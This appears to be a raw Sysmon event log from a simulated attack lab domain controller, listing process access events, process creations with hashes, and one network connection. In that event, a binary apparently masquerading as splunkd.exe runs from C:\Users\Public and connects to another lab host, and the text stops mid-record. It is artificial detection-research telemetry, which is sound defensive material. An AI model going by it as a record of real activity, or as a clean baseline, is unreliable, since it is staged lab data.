13:34:15.157{59A5CD1D-8E44-6005-0A00-00000000A301}8482684C:\Windows\system32\services.exe{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.146{59A5CD1D-8E57-6005-3500-00000000A301}3248C:\Windows\System32\vds.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationvds.exeC:\Windows\System32\vds.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F43B67F8FB870A731294662603690C2F,SHA256=9707255C9778F9A8135BAA4F1A16FAC9EBF2991FD6AF937B232D5FA52D14AC33,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.142{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.142{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.142{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.142{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.131{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E57-6005-3400-00000000A301}3156C:\Windows\System32\vdsldr.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.081{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2D00-00000000A301}2220C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.081{59A5CD1D-8E44-6005-0A00-00000000A301}848924C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2D00-00000000A301}2220C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.840{59A5CD1D-8E56-6005-2D00-00000000A301}2220C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe-----"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=D6503F8DC5DAD508A400E650EF5F4DB8,SHA256=E5008CA6E01D09A81572573769CDE57ED0BA3349956376AC1D022D0CED16C79F,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.075{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E57-6005-3400-00000000A301}3156C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.075{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E57-6005-3400-00000000A301}3156C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.075{59A5CD1D-8E57-6005-3400-00000000A301}3156C:\Windows\System32\vdsldr.exe10.0.14393.4169 (rs1_release.210107-1130)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B344B812DD6C294360563E52B2EF1C13,SHA256=0A4CA31848D7513F97F72D0292F5BBEE1CA409AAFFCACDE5369E12003B34118D,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.908{59A5CD1D-8E59-6005-4C00-00000000A301}40844088C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000001928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localUsermode2021-01-18 13:34:15.234{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-495.attackrange.local49684-false10.0.1.12-7010- 10341000x80000000000000001927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.736{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.736{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E59-6005-4C00-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E59-6005-4C00-00000000A301}4084C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:17.658{59A5CD1D-8E59-6005-4B00-00000000A301}40644068C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E59-6005-4C00-00000000A301}4084C:\Program 